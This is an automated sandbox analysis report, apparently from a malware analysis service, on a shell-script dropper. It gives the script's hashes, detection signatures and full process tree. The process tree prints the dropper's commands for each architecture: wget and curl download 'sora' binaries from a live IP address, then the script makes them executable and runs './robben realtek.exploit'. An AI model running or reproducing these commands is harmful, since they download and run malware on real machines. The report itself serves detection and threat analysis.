Analysis
max time kernel: 10s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 18/10/2024, 02:36
Static task: static1
Behavioral task behavioral1: Sample bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh, Resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: Sample bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh, Resource debian9-armhf-20240418-en
Behavioral task behavioral3: Sample bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh, Resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: Sample bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh, Resource debian9-mipsel-20240611-en
General
Target: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Size: 2KB
MD5: 2a963ff4fb99086ab454f4f26acf8b74
SHA1: 0830412185a29f4230a85d8f6eb4d15f2a165aea
SHA256: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
SHA512: 7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1561  chmod
1579  chmod
1522  chmod
1537  chmod
1597  chmod
1603  chmod
1531  chmod
1573  chmod
1585  chmod
1591  chmod
1543  chmod
1549  chmod
1555  chmod
1567  chmod

Executes dropped EXE (14 IoCs)
ioc          pid   Process
/tmp/robben  1523  robben
/tmp/robben  1532  robben
/tmp/robben  1538  robben
/tmp/robben  1544  robben
/tmp/robben  1550  robben
/tmp/robben  1556  robben
/tmp/robben  1562  robben
/tmp/robben  1568  robben
/tmp/robben  1574  robben
/tmp/robben  1580  robben
/tmp/robben  1586  robben
/tmp/robben  1592  robben
/tmp/robben  1598  robben
/tmp/robben  1604  robben

System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
pid   Process
1525  wget
1529  curl
1530  cat

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
description                    ioc          Process
File opened for modification   /tmp/robben  bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh: /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh (PID 1518) [Writes file to tmp directory]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86 (PID 1519)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86 (PID 1520)
  /bin/cat: cat sora.x86 (PID 1521)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1522) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1523) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mips (PID 1525) [System Network Configuration Discovery]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mips (PID 1529) [System Network Configuration Discovery]
  /bin/cat: cat sora.mips (PID 1530) [System Network Configuration Discovery]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1531) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1532) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86_64 (PID 1534)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86_64 (PID 1535)
  /bin/cat: cat sora.x86_64 (PID 1536)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1537) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1538) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i468 (PID 1540)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i468 (PID 1541)
  /bin/cat: cat sora.i468 (PID 1542)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1543) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1544) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i686 (PID 1546)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i686 (PID 1547)
  /bin/cat: cat sora.i686 (PID 1548)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1549) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1550) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mpsl (PID 1552)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mpsl (PID 1553)
  /bin/cat: cat sora.mpsl (PID 1554)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1555) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1556) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm4 (PID 1558)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm4 (PID 1559)
  /bin/cat: cat sora.arm4 (PID 1560)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1561) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1562) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm5 (PID 1564)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm5 (PID 1565)
  /bin/cat: cat sora.arm5 (PID 1566)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1567) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1568) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm6 (PID 1570)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm6 (PID 1571)
  /bin/cat: cat sora.arm6 (PID 1572)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1573) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1574) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm7 (PID 1576)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm7 (PID 1577)
  /bin/cat: cat sora.arm7 (PID 1578)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1579) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1580) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc (PID 1582)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc (PID 1583)
  /bin/cat: cat sora.ppc (PID 1584)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1585) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1586) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc440fp (PID 1588)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc440fp (PID 1589)
  /bin/cat: cat sora.ppc440fp (PID 1590)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1591) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1592) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.m68k (PID 1594)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.m68k (PID 1595)
  /bin/cat: cat sora.m68k (PID 1596)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1597) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1598) [Executes dropped EXE]
  /usr/bin/wget: wget http://93.123.85.141/bins/sora.sh4 (PID 1600)
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.sh4 (PID 1601)
  /bin/cat: cat sora.sh4 (PID 1602)
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya (PID 1603) [File and Directory Permissions Modification]
  /tmp/robben: ./robben realtek.exploit (PID 1604) [Executes dropped EXE]